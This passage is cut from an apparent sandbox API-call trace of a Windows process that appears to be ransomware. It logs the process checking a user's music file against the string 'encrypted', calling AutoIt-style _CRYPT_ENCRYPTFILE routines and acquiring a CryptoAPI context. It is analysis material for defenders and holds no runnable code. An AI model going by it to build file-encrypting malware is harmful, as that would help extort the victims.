lpString1="z\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="68KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ILlni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Llni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SHI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HI6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="88nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nCZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZyGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yGa2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ga2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2ZYK.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.731] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.731] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.731] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.731] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.731] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb7a8e0, ftCreationTime.dwHighDateTime=0x1d5b970, ftLastAccessTime.dwLowDateTime=0x3da53760, ftLastAccessTime.dwHighDateTime=0x1d5b9b3, ftLastWriteTime.dwLowDateTime=0x3da53760, ftLastWriteTime.dwHighDateTime=0x1d5b9b3, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="SHI6u88nCZyGa2ZYK.mp3", cAlternateFileName="SHI6U8~1.MP3")) returned 0x7c2240 [0037.732] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.732] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.732] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.732] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.732] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.732] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.732] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.732] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.733] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.733] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.733] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x7ae948, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.735] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContext") returned 0x0 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15) returned 0x7ae948 [0037.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x7ae948, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.735] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextA") returned 0x754b91dd [0037.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.736] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.738] RtlAllocateHeap 